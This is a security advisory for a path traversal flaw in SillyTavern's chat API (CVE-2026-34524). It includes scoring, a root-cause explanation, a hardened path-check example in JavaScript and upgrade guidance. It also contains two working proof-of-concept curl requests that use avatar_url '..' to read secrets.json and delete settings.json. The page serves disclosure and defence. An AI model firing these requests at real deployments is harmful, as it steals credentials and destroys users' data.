CVE-2026-34524

HIGH
2026-04-01 https://github.com/SillyTavern/SillyTavern GHSA-vprr-q85p-79mf
8.3
CVSS 3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: Low

Lifecycle Timeline

Patch Released: Apr 02, 2026 - 02:30 (nvd), patch available
Analysis Generated: Apr 01, 2026 - 22:16 (vuln.today)
CVE Published: Apr 01, 2026 - 21:41 (nvd), HIGH 8.3

Description

## Summary

A Path Traversal vulnerability in chat endpoints allows an authenticated attacker to read and delete arbitrary files under their user data root (for example `secrets.json` and `settings.json`) by supplying `avatar_url=".."`.

### Details

The input validator used by `avatar_url` blocks only `/` and NUL bytes, but does not block traversal segments like `..`.

Evidence:

- Weak validator regex (does not reject `..`): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/middleware/validateFileName.js#L24-L27>
- Vulnerable delete path construction: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L575-L577>
- Vulnerable export path construction: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L595-L598>
- Endpoint auth context (authenticated user access): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239>

Because `avatar_url=".."` is accepted, `path.join(<user>/chats, "..")` resolves to `<user>/`, enabling direct access to files outside the chats directory.

### PoC

Prerequisites:

- Valid authenticated session cookie (`cookie.txt`)
- Valid CSRF token (`$TOKEN`)

Read sensitive file (`secrets.json`):

```bash
curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","is_group":false,"file":"secrets.json","format":"jsonl","exportfilename":"x"}' \
  http://TARGET:8000/api/chats/export
```

Delete sensitive file (`settings.json`):

```bash
curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","chatfile":"settings.json"}' \
  http://TARGET:8000/api/chats/delete
```

### Impact

- Confidentiality: exposed per-user secrets and config data.
- Integrity/Availability: attacker can delete critical per-user files and break account operation.
- Risk is significant in multi-user or remotely reachable deployments.

### Resolution

The issue was addressed in version 1.17.0.
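
The validation gap described under Details, next to a resolve-then-contain check, as an added example (not SillyTavern's code or its 1.17.0 patch). The function names, the `/data/default-user/chats` layout and the join order `chatsDir/avatar_url/file` are assumptions made for illustration.

```javascript
const path = require('node:path');

// Constructed stand-in for the check the advisory describes: it rejects
// only "/" and NUL, so the single segment ".." passes.
function weakCheck(name) {
  return typeof name === 'string' && !/[\/\0]/.test(name);
}

// Assumed shape of the vulnerable construction: join after the weak check.
function unsafeChatPath(chatsDir, avatarUrl, file) {
  if (!weakCheck(avatarUrl) || !weakCheck(file)) return null;
  return path.join(chatsDir, avatarUrl, file);
}

// Hardened form: resolve first, then require the result to stay strictly
// inside chatsDir. This is a lexical check; run fs.realpathSync on both
// paths first if symlinks may exist under the base directory.
function safeChatPath(chatsDir, avatarUrl, file) {
  if (!weakCheck(avatarUrl) || !weakCheck(file)) return null;
  const base = path.resolve(chatsDir);
  const target = path.resolve(base, avatarUrl, file);
  const rel = path.relative(base, target);
  const escapes = rel === '' || rel === '..' ||
    rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
  return escapes ? null : target;
}

// Constructed sample layout and inputs.
const CHATS = path.resolve('/data/default-user/chats');
const cases = [
  ['Alice', 'chat1.jsonl'],    // ordinary request
  ['..', 'secrets.json'],      // payload shape from the advisory
  ['..', 'settings.json'],
  ['..hidden', 'notes.jsonl'], // leading dots, but not a traversal segment
];

function runCases() {
  return cases.map(([avatar, file]) => ({
    avatar,
    file,
    unsafe: unsafeChatPath(CHATS, avatar, file),
    safe: safeChatPath(CHATS, avatar, file),
  }));
}

console.table(runCases());
```

Comparing the resolved path against the base directory rejects `..` without also rejecting legitimate names that merely begin with dots.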

Analysis

Path traversal in SillyTavern's chat API allows authenticated attackers to read and delete sensitive configuration files (secrets.json, settings.json) outside the intended chats directory by exploiting insufficient input validation on the avatar_url parameter. The vulnerability (CVSS 8.3) permits traversal using '..' segments due to a regex validator that only blocks '/' and NUL bytes. …


Remediation

Within 24 hours: inventory all SillyTavern deployments and their current versions; identify instances exposed to authenticated users or the internet. Within 7 days: upgrade all SillyTavern instances to version 1.17.0 or later; validate upgrades in staging before production deployment. …


Priority Score

42
KEV: 0
EPSS: +0.0
CVSS: +42
POC: 0
